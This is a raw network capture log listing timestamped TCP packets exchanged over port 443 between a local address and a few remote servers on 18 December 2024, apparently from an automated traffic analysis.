                                                                                        Dec 18, 2024 02:10:09.571053982 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.583488941 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.583729029 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.583735943 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.589690924 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.590014935 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.590023041 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.599286079 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.599695921 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.599703074 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.608546972 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.608691931 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.608700037 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.618046999 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.618262053 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.618273020 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.627490997 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.627576113 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.627588987 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.636387110 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.636862040 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.636878014 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.645437002 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.645598888 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.645610094 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.654270887 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.654571056 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.654586077 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.671066999 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.671158075 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.671165943 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.675441027 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.675790071 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.675796986 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.681163073 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.681289911 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.681298018 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.690026045 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.690215111 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.690257072 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.690265894 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.690649033 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.699168921 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.706722021 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.706892014 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.706950903 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.706957102 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.707142115 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.714792013 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.722632885 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.722704887 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.722711086 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.730204105 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.730360031 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.730365992 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.737907887 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.738065004 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.738111019 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.738116026 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.738380909 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.745388985 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.752955914 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.753087044 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.753110886 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.753115892 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.753369093 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.759965897 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.763401031 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.763452053 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.763459921 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.782613993 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.782643080 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.782675982 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.782690048 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.782802105 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.790365934 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.791033983 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.791189909 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.791196108 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.791729927 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.791775942 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.791790009 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.794236898 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.794382095 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.794389009 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.797182083 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.797230959 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.797247887 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.798232079 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.798307896 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.798326015 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.798376083 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.798476934 CET49716443192.168.2.16142.250.181.14
                                                                                        Dec 18, 2024 02:10:09.798487902 CET44349716142.250.181.14192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.811443090 CET44349709142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.811583042 CET44349709142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.811666965 CET49709443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:10:09.880794048 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.884706020 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.884807110 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.884833097 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.896358967 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.896439075 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.896447897 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.906872034 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.906929016 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.906939983 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.918935061 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.919035912 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.919044971 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.932462931 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.932517052 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.932523012 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.942272902 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.942404032 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:09.942409992 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:09.991914988 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.000199080 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.004379034 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.004435062 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.004441023 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.055923939 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.055933952 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.072575092 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.072630882 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.072637081 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.077292919 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.077389002 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.077394009 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.093413115 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.093467951 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.093472958 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.102380037 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.102430105 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.102436066 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.126014948 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.126087904 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.126092911 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.133333921 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.133384943 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.133397102 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.153283119 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.153342009 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.153347969 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.170028925 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.170089006 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.170094967 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.179637909 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.179692984 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.179698944 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.188122988 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.188177109 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.188183069 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.195328951 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.195441961 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.195449114 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.207097054 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.207144976 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.207149982 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.218925953 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.218981028 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.218986988 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.230788946 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.230851889 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.230859041 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.255778074 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.258766890 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.258783102 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.259876966 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.262715101 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.262722969 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.262728930 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.262767076 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.268450022 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.276427031 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.276489019 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.276495934 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.284364939 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.284452915 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.284459114 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.304549932 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.304610014 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.304615974 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.307415009 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.307478905 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.307485104 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.312164068 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.312223911 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.312230110 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.316859961 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.316926003 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.316931009 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.322829008 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.322901011 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.322906017 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.330589056 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.330646992 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.330651999 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.338347912 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.338409901 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.338416100 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.351444960 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.351511002 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.351515055 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.353754044 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.353811026 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.353815079 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.361516953 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.361596107 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.361623049 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.371428013 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.371500015 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.371515989 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.379965067 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.380038977 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.380059004 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.384769917 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.384845018 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.384859085 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.392729998 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.392786026 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.392800093 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.400269985 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.400333881 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.400355101 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.410589933 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.410650969 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.410664082 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.414897919 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.414956093 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.414966106 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.422168970 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.422225952 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.422236919 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.433742046 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.433792114 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.433804989 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.433819056 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.434140921 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.443089008 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.478539944 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.478573084 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.478632927 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.478661060 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.478715897 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.478723049 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.480741024 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.480793953 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.480803013 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.482973099 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.483030081 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.483036995 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.485017061 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.485071898 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.485080004 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.487047911 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.487099886 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.487108946 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.489057064 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.489105940 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.489115953 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.491065979 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.491116047 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.491123915 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.491168022 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.491348028 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.491358995 CET44349718142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.491370916 CET49718443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.494946003 CET49709443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:10:10.494992971 CET44349709142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.635945082 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.635997057 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.636918068 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.637110949 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:10.637125015 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:10.708931923 CET49673443192.168.2.16204.79.197.203
                                                                                        Dec 18, 2024 02:10:12.531573057 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.531862020 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:12.531886101 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.533107042 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.533149958 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.533196926 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:12.533205986 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.533233881 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:12.533258915 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:12.534459114 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.534686089 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:12.534766912 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.534845114 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:12.534852982 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:12.577080965 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.443587065 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.447786093 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.447856903 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.447882891 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.460608959 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.460680008 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.460699081 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.469090939 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.469156981 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.469165087 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.484030962 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.484103918 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.484113932 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.496265888 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.496325970 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.496334076 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.504399061 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.504462004 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.504472971 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.526307106 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.526372910 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.526391029 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.562776089 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.562843084 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.562861919 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.610960007 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.610982895 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.635057926 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.635143042 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.635165930 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.640130043 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.640197992 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.640208006 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.652483940 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.652550936 CET49720443192.168.2.16142.250.181.65
